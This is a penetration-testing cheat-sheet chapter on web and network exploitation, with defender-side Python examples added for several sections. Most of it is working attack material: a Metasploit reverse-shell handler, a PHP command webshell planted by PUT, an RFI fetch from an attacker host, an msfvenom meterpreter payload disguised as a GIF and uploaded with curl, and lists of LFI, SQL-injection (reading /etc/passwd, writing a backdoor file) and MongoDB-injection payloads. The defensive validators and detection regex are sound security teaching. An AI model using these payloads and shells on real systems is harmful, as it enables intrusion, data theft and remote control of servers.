Chapter 3 - Exploiting Vulnerabilities
Finding Exploits
Search Exploit-DB
Kali> searchsploit windows 2003 | grep -i local
To quickly view the exploit
Kali> searchsploit -x ######.py
Search Google
Google> site:exploit-db.com exploit kernel <= 3
Search Metasploit
Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/*
Search Vulners
Compiling Exploits
Compile for Windows
Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Compile for Architectures
Kali> gcc -m32 -o output32 hello.c (32 bit)
Kali> gcc -m64 -o output hello.c (64 bit)
Catching Exploits
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run
Breaking out of Virtualization
WebSockets
IPv6
HTTP
Resources
Cracking the Lens: Attacking HTTP's hidden attack surface
How I hacked hundreds of companies through their helpdesk
Headers
Find which request methods the web server supports. Send the following from Burp Repeater:
OPTIONS * HTTP/1.1
...
Send fake IP
Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET
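The curl command above works because many applications read X-Forwarded-For as if it were the client address. The following is an added defender-side example (not part of the original cheat sheet) showing how an application should derive the client address: trust the header only when the TCP peer is one of its own reverse proxies, and then take the right-most entry that the proxy did not append itself. The proxy address 10.0.0.5 and the "internal" network 192.168.1.0/24 are assumptions for the example.

```python
import ipaddress
from typing import Optional

# Constructed assumption: the only hop in front of the application is a
# reverse proxy at 10.0.0.5. Anything else connecting directly is a client.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}
INTERNAL_NET = ipaddress.ip_network("192.168.1.0/24")  # assumed "internal" range


def client_ip(remote_addr: str, xff_header: Optional[str]) -> str:
    """Return the address that access control and logging should use.

    The TCP peer (remote_addr) is the only value a client cannot forge.
    X-Forwarded-For is honoured only when that peer is one of our own
    proxies, and even then the list is walked from the right, because a
    client can pre-populate the left side with any address it likes.
    """
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES or not xff_header:
        return str(peer)
    hops = [h.strip() for h in xff_header.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            # Malformed entry: fall back to the peer rather than trust garbage.
            return str(peer)
        if addr not in TRUSTED_PROXIES:
            return str(addr)  # first address not appended by our own proxy
    return str(peer)


def is_internal_request(remote_addr: str, xff_header: Optional[str]) -> bool:
    """Allow-list check an admin-only endpoint might use."""
    return ipaddress.ip_address(client_ip(remote_addr, xff_header)) in INTERNAL_NET
```

With this logic a direct connection from 203.0.113.7 that carries `X-Forwarded-For: 192.168.1.1` is still treated as 203.0.113.7, and the same header arriving through the proxy is ignored in favour of the address the proxy appended.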
Webshells
PHP CMD Shell
Place in body of a PUT request and give it a file name
PUT /directory/shell.php HTTP/1.1
...
<body>
<?php
echo exec($_GET['cmd']);
?>
Usage:
http://victim/directory/shell.php?cmd=whoami
Resources
XXE
Resources
Exploitation: XML External Entity (XXE) Injection
Exploiting a Real-World XXE Vulnerability
Exploiting XXE Vulnerabilities in file parsing
XSS
Resources
XSS Attack: Busting browsers to root
CORS
Resources
CSRF
Resources
Computerphile: Cross Site Request Forgery
Updating Anti-CSRF Tokens with BurpSuite
SSRF
Resources
What is Server side Request Forgery?
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)
Example
Sometimes what appears to be RFI is actually SSRF; the following commands help confirm it.
# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ
# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ
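The proxy.php?path=localhost:FUZZ pattern above works when the server fetches whatever URL it is handed. As an added defender-side example (not part of the original cheat sheet), this Python function validates a user-supplied URL before a server-side fetch: only http/https, no embedded credentials, no localhost, and every resolved address must be publicly routable. The resolver is injectable so the check can be exercised offline; the host names in the usage are constructed.

```python
import ipaddress
import socket
from typing import Callable, List
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def is_public_address(addr: str) -> bool:
    """True only for globally routable unicast addresses (blocks RFC1918,
    loopback, link-local such as 169.254.169.254, multicast, reserved)."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def default_resolver(host: str) -> List[str]:
    return socket.gethostbyname_ex(host)[2]


def validate_outbound_url(url: str,
                          resolver: Callable[[str], List[str]] = default_resolver) -> List[str]:
    """Return the IP addresses the fetch may connect to, or raise ValueError.

    The caller must connect to one of the returned addresses instead of
    resolving the name again, otherwise DNS rebinding defeats the check.
    """
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed: %r" % parts.scheme)
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IP, no DNS needed
    except ValueError:
        if host == "localhost" or host.endswith(".localhost"):
            raise ValueError("localhost is not allowed")
        addrs = resolver(host)
    if not addrs:
        raise ValueError("name did not resolve")
    bad = [a for a in addrs if not is_public_address(a)]
    if bad:
        raise ValueError("resolves to non-public address(es): %s" % ", ".join(bad))
    return addrs


def url_allowed(url: str, resolver: Callable[[str], List[str]] = default_resolver) -> bool:
    """Boolean wrapper for policy checks and tests."""
    try:
        validate_outbound_url(url, resolver)
        return True
    except ValueError:
        return False
```

Short-form literals such as 127.1 or a decimal address are not accepted by ipaddress and fall through to the resolver, which still returns a loopback address that the public-address check rejects. Prefer an allow-list of destination hosts over this deny-list wherever the feature permits it.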
RCE
Resources
Node.js Remote Code Execution as a Service
Exploiting Python code execution in the web
Utilizing Code Re-use or ROP in PHP Exploits
Pwning PHP Mail Function for fun and RCE
Server Side Template Injection
Resources
Server Side Template Injection
Server Side Template Injection: RCE for the Modern WebApp
API
Resources
LFI
Resources
Local File Inclusion Testing Techniques
Insecure PHP Functions & their Exploits (LFI/RFI)
LFI and RFI -- The Website Security Vulnerability
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts
Examples
file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
send post data
expect://whoami
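Every payload in the list above is either a traversal sequence or a PHP stream wrapper. The following is an added defender-side example (not part of the original cheat sheet) of how an include parameter should be resolved: reject anything with a URL scheme, confine the normalised path to an assumed include root (/var/www/app/pages) and require an allow-listed extension. The root and extension list are assumptions for the example.

```python
import posixpath
import re

PAGE_ROOT = "/var/www/app/pages"          # assumed directory of includable files
ALLOWED_EXTENSIONS = {".php", ".html"}    # assumed allow-list
# Anything that looks like scheme: (php:, file:, expect:, data:, zip: ...)
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")


def resolve_include(user_value: str, root: str = PAGE_ROOT) -> str:
    """Map a user-controlled page name to a file path inside root, or raise."""
    if "\x00" in user_value:
        raise ValueError("null byte in path")
    if SCHEME_RE.match(user_value):
        raise ValueError("stream wrapper / URL scheme not allowed")
    if user_value.startswith("/") or "\\" in user_value:
        raise ValueError("absolute or backslash path not allowed")
    candidate = posixpath.normpath(posixpath.join(root, user_value))
    # commonpath shrinks to a shorter prefix as soon as '..' climbs out of root;
    # it also avoids the string-prefix bug where /pages-other would pass.
    if posixpath.commonpath([root, candidate]) != root or candidate == root:
        raise ValueError("path escapes include root")
    if posixpath.splitext(candidate)[1] not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return candidate


def include_allowed(user_value: str) -> bool:
    """Boolean wrapper for policy checks and tests."""
    try:
        resolve_include(user_value)
        return True
    except ValueError:
        return False
```

Where the set of pages is fixed, a lookup table from short names to files is simpler and stronger than path validation; this function is for the case where the parameter genuinely has to name a file.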
Open Redirects
Resources
RFI
Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt
Padding Oracle Attack
Resources
Automated Padding Oracle Attacks with Padbuster
Arguments
url - first argument is the URL
encrypted - second argument is the encrypted text
bits - third argument is the number of bits per block
-cookies - define a cookie to use
-plaintext - plaintext to encrypt
Examples
Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8 \
    -cookies "ENC-COOKIE" \
    -plaintext '{"user":"admin","role":"admin"}'
AWS
Resources
AWS PENETRATION TESTING PART 1. S3 BUCKETS
File Upload
Make a backdoor GIF
# As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo "FFD8FFE0" | xxd -r -p > evil.gif   # FF D8 FF E0 is the JPEG SOI/APP0 header; a real GIF begins with the ASCII "GIF89a"
Kali> cat evil.php >> evil.gif
Upload From CLI
Kali> curl -X POST \
    -F "field1=test" \
    -F "file=@/home/user/evil.gif" \
    --cookie "cookie" \
    http://$TARGET/upload.php
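The trick above (image magic bytes prepended to a PHP payload, matching Content-Type) defeats checks that look at only one property of the upload. As an added defender-side example (not part of the original cheat sheet), this validator requires the extension, the sniffed magic bytes and the declared Content-Type to agree, rejects double extensions, and refuses image bodies containing script markers. The accepted formats and marker list are assumptions for the example.

```python
from typing import Dict, Optional, Tuple

# Magic bytes of the image formats this (assumed) upload endpoint accepts.
MAGIC: Dict[bytes, str] = {
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
}
EXTENSION_TYPES = {"gif": "image/gif", "jpg": "image/jpeg",
                   "jpeg": "image/jpeg", "png": "image/png"}
# Byte sequences that have no business inside an image we intend to serve.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%", b"#!/")


def sniff_image_type(data: bytes) -> Optional[str]:
    """Identify the content by its leading bytes, ignoring what the client claims."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def validate_upload(filename: str, declared_type: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Every check must agree before a file is kept."""
    name = filename.rsplit("/", 1)[-1]
    parts = name.lower().split(".")
    if len(parts) != 2:
        return False, "filename must be name.ext with a single extension"
    ext = parts[1]
    if ext not in EXTENSION_TYPES:
        return False, "extension not allowed"
    sniffed = sniff_image_type(data)
    if sniffed is None:
        return False, "content does not start with a known image header"
    if sniffed != EXTENSION_TYPES[ext]:
        return False, "magic bytes (%s) do not match extension .%s" % (sniffed, ext)
    if declared_type.split(";")[0].strip().lower() != sniffed:
        return False, "declared Content-Type does not match content"
    for marker in SCRIPT_MARKERS:
        if marker in data:
            return False, "script marker %r found in image body" % marker
    return True, sniffed
```

These checks are necessary, not sufficient: the robust version additionally re-encodes the image with an image library (which discards any trailing payload), stores the result outside the web root under a server-generated name, serves it with a fixed Content-Type, and keeps script execution disabled in the upload directory.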
E-Mail
Resources
How to Bypass E-Mail gateways using common payloads
iSCSI
Resources
An interesting route to domain admin via iSCSI
Databases
MySQL
Resources
SQLMap tricks for advanced SQL injection
Examples
username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'
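The payloads above only work when user input is spliced into the SQL text. As an added defender-side example (not part of the original cheat sheet), the following Python code builds an in-memory SQLite table with constructed rows, shows the concatenated query being bypassed with one of the payloads from the list, shows the bound-parameter version returning nothing for the same input, and adds a log-triage regex that flags the common shapes in the list.

```python
import re
import sqlite3
from typing import List


def build_demo_db() -> sqlite3.Connection:
    """In-memory table with constructed rows standing in for a real user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Input is spliced into the SQL text, so a quote changes the query structure."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Bound parameters: values travel separately from the SQL and are never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# Triage heuristic for request logs or a WAF rule, built from the payload shapes
# above: quote followed by a boolean tautology, bare "or 1=1", UNION SELECT,
# file primitives, and a trailing comment/statement terminator.
SQLI_PATTERN = re.compile(
    r"('|%27)\s*(or|and|\|\|)\s*'?\w[\w.@]*'?\s*(=|<)"   # 'OR 1=1, 1'or'1'='1, 1'||'1'<'2
    r"|\b(or|and)\s+\d+\s*=\s*\d+"                       # 1 or 1=1
    r"|\bunion\s+(all\s+)?select\b"                      # UNION SELECT 1,2,3
    r"|load_file\s*\(|into\s+(out|dump)file"             # load_file() / INTO OUTFILE
    r"|(--|;)\s*$",                                      # trailing -- or ;
    re.IGNORECASE,
)


def looks_like_sqli(value: str) -> bool:
    """Heuristic only: meant for alerting and log review, not as a blocking control."""
    return SQLI_PATTERN.search(value) is not None
```

The regex deliberately misses variants such as 1or1=1 and encoded forms; the fix is the parameterised query, the regex only tells you who is probing.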
MSSQL
Resources
SQL Injection Cheatsheet MSSQL
MongoDB
Resources
Examples
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
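The MongoDB payloads above rely on two things: user input being accepted as a query document (so `{$ne: 1}` or `{$gt: ''}` replaces a string comparison) and `$where` evaluating attacker-controlled JavaScript. As an added defender-side example (not part of the original cheat sheet), the following Python code rejects any operator key in JSON input, forces credentials to be plain strings, and flattens form input without the bracket-to-object expansion that turns `password[$ne]=1` into a nested document.

```python
from typing import Any, Dict
from urllib.parse import parse_qs


def reject_operators(value: Any, path: str = "input") -> Any:
    """Raise ValueError if a JSON value contains Mongo operator keys ($ne, $gt, $where ...)."""
    if isinstance(value, dict):
        for key, inner in value.items():
            if key.startswith("$"):
                raise ValueError("operator %r not allowed at %s" % (key, path))
            reject_operators(inner, "%s.%s" % (path, key))
    elif isinstance(value, list):
        for i, inner in enumerate(value):
            reject_operators(inner, "%s[%d]" % (path, i))
    return value


def build_login_filter(body: Dict[str, Any]) -> Dict[str, str]:
    """Credentials are compared as plain strings, never as arbitrary query documents."""
    reject_operators(body, "body")
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be strings")
    return {"username": username, "password": password}


def form_to_body(query_string: str) -> Dict[str, str]:
    """Flatten x-www-form-urlencoded input; bracketed keys are refused rather than
    expanded, so password[$ne]=1 never becomes {"password": {"$ne": "1"}}."""
    body: Dict[str, str] = {}
    for key, values in parse_qs(query_string, keep_blank_values=True).items():
        if "[" in key or "]" in key or key.startswith("$"):
            raise ValueError("nested or operator key %r not allowed" % key)
        body[key] = values[-1]
    return body


def login_filter_allowed(body: Dict[str, Any]) -> bool:
    """Boolean wrapper for JSON bodies."""
    try:
        build_login_filter(body)
        return True
    except ValueError:
        return False


def form_allowed(query_string: str) -> bool:
    """Boolean wrapper for form-encoded bodies."""
    try:
        build_login_filter(form_to_body(query_string))
        return True
    except ValueError:
        return False
```

The `$where` and mapReduce payloads are closed off on the server side as well: set `security.javascriptEnabled: false` in the mongod configuration unless server-side JavaScript is genuinely required, and never build `$where` strings from request data.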
PBX
Resources
Introduction to Telephony and PBX
Examples
Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGET